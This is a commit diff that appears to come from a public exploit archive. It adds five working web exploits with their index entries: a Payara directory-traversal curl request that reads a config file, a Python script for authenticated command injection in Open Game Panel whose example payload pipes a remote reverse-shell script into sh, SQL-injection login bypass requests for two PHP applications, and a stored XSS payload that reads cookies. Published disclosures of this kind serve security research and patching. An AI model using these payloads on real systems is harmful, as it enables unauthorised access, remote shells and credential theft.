DB: 2021-10-05
5 changes to exploits/shellcodes Payara Micro Community 5.2021.6 - Directory Traversal Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass Open Game Panel - Remote Code Execution (RCE) (Authenticated) Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
This commit is contained in:
parent
8955161978
commit
7cf828b365
6 changed files with 267 additions and 0 deletions
35
exploits/multiple/webapps/50371.txt
Normal file
35
exploits/multiple/webapps/50371.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
|
||||||
|
# Date: 01/10/2021
|
||||||
|
# Exploit Author: Yasser Khan (N3T_hunt3r)
|
||||||
|
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
|
||||||
|
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
|
||||||
|
# Version: Payara Micro Community 5.2021.6
|
||||||
|
# Tested on: Linux/Windows OS
|
||||||
|
# CVE : CVE-2021-41381
|
||||||
|
|
||||||
|
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
|
||||||
|
Step1: Open the browser check the version of the payara software
|
||||||
|
|
||||||
|
Step2: Add this Path at end of the URL
|
||||||
|
/.//WEB-INF/classes/META-INF/microprofile-config.properties
|
||||||
|
|
||||||
|
Step3: Check the response with match containing
|
||||||
|
"payara.security.openid.default.providerURI="
|
||||||
|
|
||||||
|
"payara.security.openid.sessionScopedConfiguration=true"
|
||||||
|
|
||||||
|
Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.
|
||||||
|
|
||||||
|
Step5: Alternatively we can use CURL by using this command:
|
||||||
|
|
||||||
|
Request:
|
||||||
|
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties
|
||||||
|
|
||||||
|
Reference:
|
||||||
|
|
||||||
|
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
|
||||||
|
https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
|
||||||
|
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
|
72
exploits/multiple/webapps/50373.py
Executable file
72
exploits/multiple/webapps/50373.py
Executable file
|
@ -0,0 +1,72 @@
|
||||||
|
# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
|
||||||
|
# Google Dork: intext:"Open Game Panel 2021"
|
||||||
|
# Date: 08/14/2021
|
||||||
|
# Exploit Author: prey
|
||||||
|
# Vendor Homepage: https://www.opengamepanel.org/
|
||||||
|
# Software Link: https://github.com/OpenGamePanel/OGP-Website
|
||||||
|
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
|
||||||
|
# Tested on: CentOS Linux 5.4.102
|
||||||
|
|
||||||
|
#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
|
||||||
|
betwen ';', the user needs to be authenticated for this.
|
||||||
|
|
||||||
|
|
||||||
|
import requests
|
||||||
|
|
||||||
|
banner = """
|
||||||
|
@
|
||||||
|
@ @@& @@@@@/
|
||||||
|
@ @& #@@@@@& .=
|
||||||
|
,/%@#
|
||||||
|
@ @@@@@@@@@@@@@((%@@@@*
|
||||||
|
@ #@@@@@@@@@@@@@@@*%@,
|
||||||
|
@ @@@@@@@@@@@@@@&@@@@
|
||||||
|
@ &@@@@@@@@@/ &@@@.
|
||||||
|
@ @@@@@@@@@(
|
||||||
|
@ @@@@@@@@@@@@@&*
|
||||||
|
@ &@@@@@@@@@@@@@@@@%
|
||||||
|
@ ,&@@@@@@@@@@@@@
|
||||||
|
@ %@@@@@@@.
|
||||||
|
@ .%@@@@@@@@% @@@@@@
|
||||||
|
@ @@@@@# .&@@@@#
|
||||||
|
@ (@@@@@@@@@@@. .@@@& @@%
|
||||||
|
@ .@@@@@, #@@@@@* #@@@ @@@@@
|
||||||
|
@ @@@& &@@@. @@@
|
||||||
|
@ ,@@@ @@@@@@
|
||||||
|
@ @@@ %@@@,
|
||||||
|
@&@@ @@@,
|
||||||
|
@@@@
|
||||||
|
@@@@
|
||||||
|
|
||||||
|
*@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@=
|
||||||
|
%
|
||||||
|
*@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@=
|
||||||
|
%
|
||||||
|
*@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@=
|
||||||
|
%
|
||||||
|
*@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@=
|
||||||
|
%
|
||||||
|
*@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@=
|
||||||
|
@@@@
|
||||||
|
|
||||||
|
##You can get mod_id and home_id on your game panel URL when you are logged
|
||||||
|
|
||||||
|
"""
|
||||||
|
print(banner)
|
||||||
|
|
||||||
|
target = input("Target url: (eg: https://panel.example.org)\n")
|
||||||
|
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
|
||||||
|
mod_id = input("Mod_id value: (eg: 2437)\n")
|
||||||
|
home_id = input("Home_id value: (eg: 3737)\n")
|
||||||
|
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
|
||||||
|
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")
|
||||||
|
|
||||||
|
url = target + "/home.php?m=gamemanager&p=game_monitor"
|
||||||
|
cookies = {"opengamepanel_web": opengamepanel_web}
|
||||||
|
headers = {"Content-Type": "application/x-www-form-urlencoded"}
|
||||||
|
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
|
||||||
|
try:
|
||||||
|
requests.post(url, headers=headers, cookies=cookies, data=data)
|
||||||
|
except:
|
||||||
|
print("Something went wrong, check your inputs or try manually exploiting the map parameter")
|
||||||
|
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")
|
45
exploits/php/webapps/50372.txt
Normal file
45
exploits/php/webapps/50372.txt
Normal file
|
@ -0,0 +1,45 @@
|
||||||
|
# Exploit Title: Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass
|
||||||
|
# Date: 2021-09-20
|
||||||
|
# Exploit Author: Nitin Sharma(vidvansh)
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
|
||||||
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Windows 10 - XAMPP Server
|
||||||
|
|
||||||
|
|
||||||
|
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
|
||||||
|
|
||||||
|
#Steps-To-Reproduce:
|
||||||
|
Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
|
||||||
|
Step 2 – Enter anything in username and password
|
||||||
|
Step 3 – Click on Login and capture the request in the burp suite
|
||||||
|
Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
|
||||||
|
Step 5 – Click forward and now you will be logged in as admin.
|
||||||
|
|
||||||
|
# PoC:
|
||||||
|
|
||||||
|
POST /lodge/classes/Login.php?f=login HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 49
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/lodge/admin/login.php
|
||||||
|
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
|
||||||
|
Sec-Fetch-Dest: empty
|
||||||
|
Sec-Fetch-Mode: cors
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
|
||||||
|
username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
|
||||||
|
|
||||||
|
|
||||||
|
# Authentication Bypass:
|
||||||
|
|
||||||
|
# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>
|
||||||
|
Username: ' or 1 -- -
|
||||||
|
Password: ' or 1 -- -
|
36
exploits/php/webapps/50374.txt
Normal file
36
exploits/php/webapps/50374.txt
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
|
||||||
|
# Date: 2021-10-02
|
||||||
|
# Exploit Author: Jordan Glover
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
|
||||||
|
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Windows 10 + XAMPP v3.3.0
|
||||||
|
|
||||||
|
Steps-To-Reproduce:
|
||||||
|
Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php
|
||||||
|
Step 2 – Enter the default admin username janobe and enter password test
|
||||||
|
Step 3 – Click on Sign in and capture the request in the Burp Suite
|
||||||
|
Step 4 – Change the user_email to janobe' or '1'='1
|
||||||
|
Step 5 – Click forward and now you will be logged in as an admin.
|
||||||
|
|
||||||
|
POC
|
||||||
|
|
||||||
|
POST /bsenordering/admin/login.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 40
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/bsenordering/admin/login.php
|
||||||
|
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
|
||||||
|
user_email=janobe' or '1'='1&user_pass=test&btnLogin=
|
74
exploits/php/webapps/50375.txt
Normal file
74
exploits/php/webapps/50375.txt
Normal file
|
@ -0,0 +1,74 @@
|
||||||
|
# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
|
||||||
|
# Date: 2021-10-03
|
||||||
|
# Exploit Author: Jordan Glover
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
|
||||||
|
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Windows 10 + XAMPP v3.3.0
|
||||||
|
|
||||||
|
Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.
|
||||||
|
|
||||||
|
Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
|
||||||
|
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
|
||||||
|
Step 3 - Save the product.
|
||||||
|
|
||||||
|
The stored XSS triggers for all users that navigate to the home page.
|
||||||
|
|
||||||
|
POC
|
||||||
|
|
||||||
|
POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
|
||||||
|
Content-Length: 1203
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
|
||||||
|
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="OWNERNAME"
|
||||||
|
|
||||||
|
Test
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="OWNERPHONE"
|
||||||
|
|
||||||
|
0000000000
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="PRODESC"
|
||||||
|
|
||||||
|
<script>alert(document.cookie)</script>
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="CATEGORY"
|
||||||
|
|
||||||
|
3
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="ORIGINALPRICE"
|
||||||
|
|
||||||
|
100
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="PROPRICE"
|
||||||
|
|
||||||
|
100
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="PROQTY"
|
||||||
|
|
||||||
|
100
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="image"; filename=""
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------375756297829058981022228786743
|
||||||
|
Content-Disposition: form-data; name="save"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------375756297829058981022228786743--
|
|
@ -44483,3 +44483,8 @@ id,file,description,date,author,type,platform,port
|
||||||
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
|
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
|
||||||
50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
|
50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
|
||||||
50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
|
50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
|
||||||
|
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple,
|
||||||
|
50372,exploits/php/webapps/50372.txt,"Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
|
||||||
|
50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple,
|
||||||
|
50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php,
|
||||||
|
50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue